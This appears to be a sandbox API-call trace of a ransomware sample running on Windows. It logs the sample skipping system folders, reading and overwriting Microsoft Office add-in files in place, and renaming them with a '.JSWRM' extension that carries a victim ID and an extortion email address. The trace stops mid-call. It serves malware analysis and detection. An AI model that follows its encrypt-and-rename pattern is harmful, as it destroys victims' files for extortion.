WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSEC.DLL", lpUsedDefaultChar=0x0) returned 10 [0123.465] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133819a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSOSEC.XML", cAlternateFileName="")) returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2=".") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="..") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="...") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="windows") returned -1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="recovery") returned -1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="perflogs") returned -1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="documents and settings") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="$RECYCLE.BIN") returned 1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="system volume information") returned -1 [0123.465] lstrcmpiW (lpString1="MSOSEC.XML", lpString2="msocache") returned 1 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.XML", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSEC.XML", lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.XML", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOSEC.XML", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOSEC.XML", lpUsedDefaultChar=0x0) returned 10 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSOSEC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msosec.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.466] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=179) returned 1 [0123.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.466] ReadFile (in: hFile=0x238, lpBuffer=0x235d38, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x235d38*, lpNumberOfBytesRead=0x345e89c*=0xb0, lpOverlapped=0x0) returned 1 [0123.550] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.550] WriteFile (in: hFile=0x238, lpBuffer=0x235d38*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x235d38*, lpNumberOfBytesWritten=0x345e898*=0xb0, lpOverlapped=0x0) returned 1 [0123.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0123.550] CloseHandle (hObject=0x238) returned 1 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0123.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0123.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0123.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0123.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0123.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0123.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.551] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSOSEC.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msosec.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSOSEC.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msosec.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0123.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0123.553] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30a, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSSPC.ECF", cAlternateFileName="")) returned 1 [0123.553] lstrcmpiW (lpString1="MSSPC.ECF", lpString2=".") returned 1 [0123.553] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="..") returned 1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="...") returned 1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="windows") returned -1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="recovery") returned -1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="perflogs") returned -1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="documents and settings") returned 1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="$RECYCLE.BIN") returned 1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="system volume information") returned -1 [0123.554] lstrcmpiW (lpString1="MSSPC.ECF", lpString2="msocache") returned 1 [0123.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSPC.ECF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSPC.ECF", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSPC.ECF", lpUsedDefaultChar=0x0) returned 9 [0123.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSPC.ECF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSPC.ECF", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSPC.ECF", lpUsedDefaultChar=0x0) returned 9 [0123.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0123.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0123.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0123.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msspc.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.556] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=778) returned 1 [0123.556] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x300) returned 0x20b1f8 [0123.556] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x300, lpOverlapped=0x0) returned 1 [0123.557] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.557] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x300, lpOverlapped=0x0) returned 1 [0123.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0123.557] CloseHandle (hObject=0x238) returned 1 [0123.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0123.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0123.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0123.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0123.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0123.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0123.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0123.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSSPC.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msspc.ecf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSSPC.ECF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msspc.ecf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0123.564] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x238ed8d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x238ed8d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2984c3b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25c40, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="otkloadr_x64.dll", cAlternateFileName="OTKLOA~1.DLL")) returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2=".") returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="..") returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="...") returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="windows") returned -1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="recovery") returned -1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="perflogs") returned -1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="documents and settings") returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="system volume information") returned -1 [0123.564] lstrcmpiW (lpString1="otkloadr_x64.dll", lpString2="msocache") returned 1 [0123.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="otkloadr_x64.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0123.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="otkloadr_x64.dll", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="otkloadr_x64.dll", lpUsedDefaultChar=0x0) returned 16 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="otkloadr_x64.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="otkloadr_x64.dll", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="otkloadr_x64.dll", lpUsedDefaultChar=0x0) returned 16 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0123.564] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x786, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTEX.ECF", cAlternateFileName="")) returned 1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2=".") returned 1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="..") returned 1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="...") returned 1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="windows") returned -1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="recovery") returned -1 [0123.564] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="perflogs") returned -1 [0123.565] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="documents and settings") returned 1 [0123.565] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="$RECYCLE.BIN") returned 1 [0123.565] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="system volume information") returned -1 [0123.565] lstrcmpiW (lpString1="OUTEX.ECF", lpString2="msocache") returned 1 [0123.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX.ECF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0123.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX.ECF", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTEX.ECF", lpUsedDefaultChar=0x0) returned 9 [0123.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0123.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX.ECF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0123.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTEX.ECF", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTEX.ECF", lpUsedDefaultChar=0x0) returned 9 [0123.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0123.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0123.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0123.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0123.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\OUTEX.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\outex.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0123.567] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1926) returned 1 [0123.567] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0123.567] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0123.574] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.574] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0123.575] CloseHandle (hObject=0x238) returned 1 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0123.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0123.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0123.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, 